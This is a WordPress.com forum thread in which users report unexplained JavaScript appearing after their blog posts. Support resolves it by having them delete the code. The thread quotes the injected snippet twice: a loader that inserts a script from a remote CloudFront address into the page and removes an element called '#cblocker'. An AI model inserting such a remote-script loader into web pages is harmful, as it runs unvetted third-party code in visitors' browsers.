Strange Coding

  • Author
    Posts
  • #843198

    dreamincnj
    Member

    Hi all one two of my wordpress websites i’m getting strange codes posting I do not know how or why. For example I just wrote a new blog post and here is what appears after the post. I have not published it yet.

    // -1 ? ‘https’: ‘http’;
    var ccm = document.createElement(‘script’); ccm.type = ‘text/javascript’; ccm.async = true;
    ccm.src = http+’://d3lvr7yuk4uaui.cloudfront.net/items/loaders/loader_1063.js?aoi=1311798366&pid=1063&zoneid=14731&cid=&rid=&ccid=&ip=’;
    var s = document.getElementsByTagName(‘script’)[0]; s.parentNode.insertBefore(ccm, s);

    jQuery(‘#cblocker’).remove();
    });
    };
    // ]]>

    // -1 ? ‘https’: ‘http’;
    var ccm = document.createElement(‘script’); ccm.type = ‘text/javascript’; ccm.async = true;
    ccm.src = http+’://d3lvr7yuk4uaui.cloudfront.net/items/loaders/loader_1063.js?aoi=1311798366&pid=1063&zoneid=14731&cid=&rid=&ccid=&ip=’;
    var s = document.getElementsByTagName(‘script’)[0]; s.parentNode.insertBefore(ccm, s);

    jQuery(‘#cblocker’).remove();
    });
    };
    // ]]>

    Someone please help me out.

    The blog I need help with is 4dreaminc.wordpress.com.

    #843492

    devenburks
    Member

    Having the same problem! Would love some resolution on the matter.

    #843493

    timethief
    Member

    Hi there,
    This is now the third thread with the same issue. I have flagged it do Staff attention.

    #843494

    macmanx
    Staff

    I can’t see where that is coming from. Are you using the Visual editor tab, HTML editor tab, full screen editor, or New Post tab at the main WordPress.com page?

    #843495

    dreamincnj
    Member

    I have resolved this issue. Someone from the support team did reach out to me. This what they told me

    Can you try removing that block of code from both of those pages (About and Media)?

    Please note that we remove JavaScript, Flash, iframe, form, and input tags for security reasons.

    Please see the following page for full details:
    http://support.wordpress.com/code/

    For me doing this worked. I went into the HTML tab and removed the code that was showing up on my website. Hopefully this can help you out as well.

The topic ‘Strange Coding’ is closed to new replies.